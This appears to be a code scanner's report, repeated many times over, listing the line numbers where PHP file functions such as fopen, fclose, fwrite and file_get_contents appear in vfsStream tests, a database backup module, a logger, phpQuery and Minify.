    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    file_put_contents was found in the file vfsStreamResolveIncludePathTestCase.php
    Ligne50: file_put_contents('vfs://root/a/path/knownFile.php', '<?php ?>');
    file_get_contents was found in the file vfsStreamWrapperDirTestCase.php
    Ligne411: file_get_contents(vfsStream::url('foo/bar/../baz2'))
    Ligne422: file_get_contents(vfsStream::url('foo/../../../../bar/../baz2'))
    file_get_contents was found in the file vfsStreamWrapperDirTestCase.php
    Ligne411: file_get_contents(vfsStream::url('foo/bar/../baz2'))
    Ligne422: file_get_contents(vfsStream::url('foo/../../../../bar/../baz2'))
    file_get_contents was found in the file vfsStream.php
    Ligne285: $content = file_get_contents($fileinfo->getPathname());
    fwrite was found in the file vfsStreamPrintVisitor.php
    Ligne105: fwrite($this->out, str_repeat('  ', $this->depth) . '- ' . $name . '\n');
    fopen was found in the file db-management.php
    Ligne245: $fs = fopen( $database_sql_file, 'r' );
    Ligne332: $fs = @fopen( $latest_backup['full_path'], 'r' );
    Ligne569: $fh = @fopen( $dump_file_path, 'a' );
    Ligne634: $fh = @fopen( $dump_file_path, 'a' );
    fclose was found in the file db-management.php
    Ligne280: fclose( $fs );
    Ligne368: fclose( $fs );
    Ligne607: fclose( $fh );
    Ligne693: fclose( $fh );
    fopen was found in the file db-management.php
    Ligne245: $fs = fopen( $database_sql_file, 'r' );
    Ligne332: $fs = @fopen( $latest_backup['full_path'], 'r' );
    Ligne569: $fh = @fopen( $dump_file_path, 'a' );
    Ligne634: $fh = @fopen( $dump_file_path, 'a' );
    fclose was found in the file db-management.php
    Ligne280: fclose( $fs );
    Ligne368: fclose( $fs );
    Ligne607: fclose( $fh );
    Ligne693: fclose( $fh );
    fopen was found in the file db-management.php
    Ligne245: $fs = fopen( $database_sql_file, 'r' );
    Ligne332: $fs = @fopen( $latest_backup['full_path'], 'r' );
    Ligne569: $fh = @fopen( $dump_file_path, 'a' );
    Ligne634: $fh = @fopen( $dump_file_path, 'a' );
    fwrite was found in the file db-management.php
    Ligne601: fwrite( $fh, $output );
    Ligne687: fwrite( $fh, $output );
    fclose was found in the file db-management.php
    Ligne280: fclose( $fs );
    Ligne368: fclose( $fs );
    Ligne607: fclose( $fh );
    Ligne693: fclose( $fh );
    fopen was found in the file db-management.php
    Ligne245: $fs = fopen( $database_sql_file, 'r' );
    Ligne332: $fs = @fopen( $latest_backup['full_path'], 'r' );
    Ligne569: $fh = @fopen( $dump_file_path, 'a' );
    Ligne634: $fh = @fopen( $dump_file_path, 'a' );
    fwrite was found in the file db-management.php
    Ligne601: fwrite( $fh, $output );
    Ligne687: fwrite( $fh, $output );
    fclose was found in the file db-management.php
    Ligne280: fclose( $fs );
    Ligne368: fclose( $fs );
    Ligne607: fclose( $fh );
    Ligne693: fclose( $fh );
    file_put_contents was found in the file class-logger.php
    Ligne282: file_put_contents($this->logFilePath(), $message, FILE_APPEND | LOCK_EX);
    Ligne296: $response = file_put_contents($log_path, '');
    file_put_contents was found in the file class-logger.php
    Ligne282: file_put_contents($this->logFilePath(), $message, FILE_APPEND | LOCK_EX);
    Ligne296: $response = file_put_contents($log_path, '');
    file_put_contents was found in the file phpQuery.php
    Ligne1402: //		file_put_contents(dirname(__FILE__).'/phpQuery.log', print_r($in, true).'\n
    file_get_contents was found in the file phpQuery.php
    Ligne4773: file_get_contents($file), $contentType
    Ligne4824: return self::newDocumentPHP(file_get_contents($file), $contentType);
    file_get_contents was found in the file phpQuery.php
    Ligne4773: file_get_contents($file), $contentType
    Ligne4824: return self::newDocumentPHP(file_get_contents($file), $contentType);
    file_get_contents was found in the file Minify.php
    Ligne90: $data = file_get_contents($data);
    fopen was found in the file Minify.php
    Ligne112: if (($handler = @fopen($path, 'w')) === false) {
    fwrite was found in the file Minify.php
    Ligne117: if (@fwrite($handler, $content) === false) {
    fclose was found in the file Minify.php
